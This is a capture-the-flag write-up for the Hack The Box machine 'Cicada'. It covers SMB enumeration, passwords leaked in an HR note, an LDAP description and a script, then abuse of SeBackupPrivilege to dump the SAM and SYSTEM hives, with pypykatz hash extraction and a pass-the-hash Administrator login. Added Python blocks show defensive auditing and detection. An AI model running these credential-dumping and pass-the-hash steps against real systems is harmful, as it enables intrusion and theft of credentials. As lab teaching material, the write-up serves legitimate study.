Cicada is an easy-difficulty machine from Hack The Box. Initial enumeration reveals exposed SMB shares that hand us a first set of credentials; those lead to another SMB share from which we exfiltrate more credentials and connect to the system to claim the user flag. Finally, abusing the SeBackupPrivilege privilege lets us back up the SAM and SYSTEM hives, extract their secrets, and recover the Administrator hash for the root flag.
```
PS C:\Users\0xkujen> nmap -A -Pn 10.129.35.108
Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-28 20:03 W. Central Africa Standard Time
NSOCK ERROR [0.2640s] ssl_init_helper(): OpenSSL legacy provider failed to load.
Stats: 0:00:29 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 81.82% done; ETC: 20:03 (0:00:04 remaining)
Stats: 0:00:29 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 90.91% done; ETC: 20:03 (0:00:02 remaining)
Stats: 0:01:25 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.93% done; ETC: 20:04 (0:00:00 remaining)
Stats: 0:01:25 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.93% done; ETC: 20:04 (0:00:00 remaining)
Nmap scan report for 10.129.35.108
Host is up (0.13s latency).
Not shown: 989 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-09-29 02:07:07Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2016 (85%)
OS CPE: cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows Server 2016 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE (using port 139/tcp)
HOP RTT       ADDRESS
1   153.00 ms 10.10.16.1
2   153.00 ms 10.129.35.108

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 107.05 seconds
PS C:\Users\0xkujen>
```
SMB Access to Credentials exfiltration
We can see the “typical” Windows machine ports. SMB is also open on the box, so let’s explore it:
```
kujen@kujen:~$ smbclient -L \\10.129.192.186 -N

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	DEV             Disk
	HR              Disk
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share
	SYSVOL          Disk      Logon server share
tstream_smbXcli_np_destructor: cli_close failed on pipe srvsvc. Error was NT_STATUS_IO_TIMEOUT
SMB1 disabled -- no workgroup available
```
And we do find some interesting shares. However, we can only access HR for now:
```
kujen@kujen:~$ smbclient \\\\10.129.192.186\\HR -N
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Mar 14 13:29:09 2024
  ..                                  D        0  Thu Mar 14 13:21:29 2024
  Notice from HR.txt                  A     1266  Wed Aug 28 18:31:48 2024

		4168447 blocks of size 4096. 422276 blocks available
smb: \> get "Notice from HR.txt"
getting file \Notice from HR.txt of size 1266 as Notice from HR.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)
smb: \>
```
Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.
Your default password is: Cicada$M6Corpb*@Lp#nZp!8
To change your password:
1. Log in to your Cicada Corp account using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change Password".
4. Follow the prompts to create a new password. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
5. After changing your password, make sure to save your changes.
Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.
If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at [email protected].
Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!
Best regards, Cicada Corp
The note contains a default password: Cicada$M6Corpb*@Lp#nZp!8. Let’s first enumerate the system for usernames using crackmapexec:
Now we can build a wordlist from those usernames and test the password against them; the valid user turns out to be michael.wrightson. Let’s use that account to get something more useful with the ldapdomaindump tool:
```
┌──(kali㉿kali)-[~]
└─$ ldapdomaindump ldap://10.129.192.186 -u 'cicada.htb\michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8'
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished
```
We can find this inside of the users dump file:
```
Just incase I forget my password is aRt$Lp#7t*VQ!3
```
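Passwords parked in the description field of a user object are exactly what ldapdomaindump surfaces here. The following is an added defensive audit, not part of the original writeup: it scans a dump in the layout ldapdomaindump's domain_users.json uses (a list of {dn, attributes} objects with list-valued attributes; that layout is an assumption) and flags text attributes that carry a password keyword or a password-looking token. The records it runs on are constructed.

```python
"""Audit an ldapdomaindump user dump for secrets pasted into text attributes.

Added example, not from the writeup. It assumes domain_users.json has the
ldapdomaindump/ldap3 layout (a list of {"dn": ..., "attributes": {...}},
every attribute value a list); the records below are constructed.
"""
import json
import re

# Attributes admins commonly (mis)use as sticky notes.
TEXT_ATTRS = ("description", "info", "comment")

# A password keyword, or an 8+ char token mixing letters, digits and symbols.
KEYWORD_RE = re.compile(r"\b(pass(word|wd)?|pwd|cred(ential)?s?)\b", re.I)
TOKEN_RE = re.compile(r"(?=\S*[A-Za-z])(?=\S*\d)(?=\S*[^\w\s])\S{8,}")

SAMPLE_DUMP = json.dumps([  # constructed; mirrors the writeup's finding
    {"dn": "CN=Michael Wrightson,CN=Users,DC=cicada,DC=htb",
     "attributes": {"sAMAccountName": ["michael.wrightson"],
                    "description": ["Helpdesk technician"]}},
    {"dn": "CN=David Orelious,CN=Users,DC=cicada,DC=htb",
     "attributes": {"sAMAccountName": ["david.orelious"],
                    "description": ["Just incase I forget my password is aRt$Lp#7t*VQ!3"]}},
    {"dn": "CN=svc-backup,CN=Users,DC=cicada,DC=htb",
     "attributes": {"sAMAccountName": ["svc-backup"],
                    "info": ["ticket #4411: rotate Q1!Service9x"]}},
])


def find_leaked_secrets(dump_json):
    """Return (account, attribute, value, reason) for each suspicious field."""
    findings = []
    for entry in json.loads(dump_json):
        attrs = entry.get("attributes", {})
        name = (attrs.get("sAMAccountName") or ["?"])[0]
        for attr in TEXT_ATTRS:
            for value in attrs.get(attr, []):
                if KEYWORD_RE.search(value):
                    findings.append((name, attr, value, "password keyword"))
                elif TOKEN_RE.search(value):
                    findings.append((name, attr, value, "password-like token"))
    return findings


if __name__ == "__main__":
    for acct, attr, value, why in find_leaked_secrets(SAMPLE_DUMP):
        print(f"[!] {acct}: {attr} ({why}): {value}")
```

Any authenticated domain user can read these attributes, so a hit here means the secret is already exposed to the whole domain and should be rotated, not just deleted from the field.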
Let’s now see if we can use that password, which belongs to david.orelious, against our SMB shares:
```
kujen@kujen:~$ smbclient \\\\10.129.192.186\\DEV -U david.orelious
Password for [WORKGROUP\david.orelious]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Mar 14 13:31:39 2024
  ..                                  D        0  Thu Mar 14 13:21:29 2024
  Backup_script.ps1                   A      601  Wed Aug 28 18:28:22 2024

		4168447 blocks of size 4096. 439019 blocks available
smb: \> get Backup_script.ps1
getting file \Backup_script.ps1 of size 601 as Backup_script.ps1 (0.5 KiloBytes/sec) (average 0.5 KiloBytes/sec)
smb: \> exit
```
We find a PowerShell script and download it to our local machine. Let’s see what it has for us:
It contains a new password, this time for emily.oscars. Let’s try connecting to the machine directly with it:
```
┌──(kali㉿kali)-[~]
└─$ evil-winrm -i 10.129.192.186 -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt'

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> cat ../desktop/user.txt
716fc9cf133233d53d2c24284632aa04
```
Listing the privileges held by emily.oscars shows:

```
Privilege Name                Description                    State
============================= ============================== =======
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
```
Doing a quick search for SeBackupPrivilege I stumbled upon this great article. This privilege lets its holder read any file on the system regardless of its ACL, which we will use to our advantage. I’ll go ahead and save a copy of the SAM hive, and likewise a copy of the SYSTEM hive, which holds the boot key needed to decrypt the SAM:
```
*Evil-WinRM* PS C:\> reg save hklm\sam c:\Temp\sam
The operation completed successfully.
*Evil-WinRM* PS C:\> reg save hklm\system c:\Temp\system
The operation completed successfully.
*Evil-WinRM* PS C:\> cd Temp
*Evil-WinRM* PS C:\Temp> download sam
Info: Downloading C:\Temp\sam to sam
Info: Download successful!
*Evil-WinRM* PS C:\Temp> download system
Info: Download successful!
```
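From the blue-team side, the two `reg save` calls above are the loud part of this step: reg.exe exporting the SAM, SYSTEM or SECURITY hive is almost never legitimate outside of scheduled backup tooling. The detection below is an added example, not from the writeup; it runs over constructed process-creation records shaped like Windows Security event 4688 fields (SubjectUserName, NewProcessName, ParentProcessName, CommandLine), which is an assumption about what a collector forwards, and flags full-hive exports while ignoring ordinary `reg query` use and exports of application subkeys.

```python
"""Flag SAM/SYSTEM/SECURITY hive exports via "reg save" in process telemetry.

Added example, not from the writeup. The records below are constructed in the
shape of Windows Security event 4688 fields (SubjectUserName, NewProcessName,
ParentProcessName, CommandLine); that a collector forwards those fields under
these names is an assumption.
"""
import re

HIVES = ("sam", "system", "security")
# reg / reg.exe / full path, optional quotes, "save", short or long hive root;
# the hive name must end the key (exporting a subkey is not a full hive dump).
REG_SAVE_RE = re.compile(
    r'(?:^|[\\\s"])reg(?:\.exe)?"?\s+save\s+"?(?:hklm|hkey_local_machine)\\('
    + "|".join(HIVES) + r')(?=["\s]|$)',
    re.I,
)

SAMPLE_EVENTS = [  # constructed 4688-style records
    {"SubjectUserName": "emily.oscars", "NewProcessName": r"C:\Windows\System32\reg.exe",
     "ParentProcessName": r"C:\Windows\System32\wsmprovhost.exe",
     "CommandLine": r"reg save hklm\sam c:\Temp\sam"},
    {"SubjectUserName": "emily.oscars", "NewProcessName": r"C:\Windows\System32\reg.exe",
     "ParentProcessName": r"C:\Windows\System32\wsmprovhost.exe",
     "CommandLine": r'"C:\Windows\System32\reg.exe" save HKEY_LOCAL_MACHINE\SYSTEM c:\Temp\system'},
    {"SubjectUserName": "svc-deploy", "NewProcessName": r"C:\Windows\System32\reg.exe",
     "ParentProcessName": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"reg save HKLM\Software\Contoso C:\backup\contoso.hiv"},
    {"SubjectUserName": "jdoe", "NewProcessName": r"C:\Windows\System32\reg.exe",
     "ParentProcessName": r"C:\Windows\explorer.exe",
     "CommandLine": r"reg query hklm\system\currentcontrolset\services"},
]


def detect_hive_exports(events):
    """Return one alert per event that exports a credential-bearing hive."""
    alerts = []
    for ev in events:
        if not ev.get("NewProcessName", "").lower().endswith("\\reg.exe"):
            continue
        match = REG_SAVE_RE.search(ev.get("CommandLine", ""))
        if not match:
            continue
        parent = ev.get("ParentProcessName", "").rsplit("\\", 1)[-1].lower()
        alerts.append({
            "user": ev.get("SubjectUserName"),
            "hive": match.group(1).upper(),
            "parent": parent,
            # wsmprovhost.exe as parent means the export ran over WinRM, as in the writeup
            "remote_session": parent == "wsmprovhost.exe",
        })
    return alerts


if __name__ == "__main__":
    for alert in detect_hive_exports(SAMPLE_EVENTS):
        print(f"[!] {alert['user']} exported {alert['hive']} via {alert['parent']}")
```

Pair the alert with a review of who actually holds SeBackupPrivilege (Backup Operators membership in particular); an ordinary user account in that group is the root cause here, and the hive export is only the symptom.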
Now we’ll just extract the hive secrets from the files using pypykatz:
```
┌──(kali㉿kali)-[~/hackthebox/cicada]
└─$ pypykatz registry --sam sam system
/usr/bin/pypykatz:6: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import load_entry_point
WARNING:pypykatz:SECURITY hive path not supplied! Parsing SECURITY will not work
WARNING:pypykatz:SOFTWARE hive path not supplied! Parsing SOFTWARE will not work
============== SYSTEM hive secrets ==============
CurrentControlSet: ControlSet001
Boot Key: 3c2b033757a49110a9ee680b46e8d620
============== SAM hive secrets ==============
HBoot Key: a1c299e572ff8c643a857d3fdb3e5c7c10101010101010101010101010101010
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
```
And now simply connect to the server using our Administrator hash and claim our root flag:
```
┌──(kali㉿kali)-[~]
└─$ evil-winrm -i 10.129.192.186 -u Administrator -H 2b87e7c93a3e8a0ea4a581937016f341

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cat ../desktop/root.txt
0b2a350ae69d0db519f0d06c503adf5b
```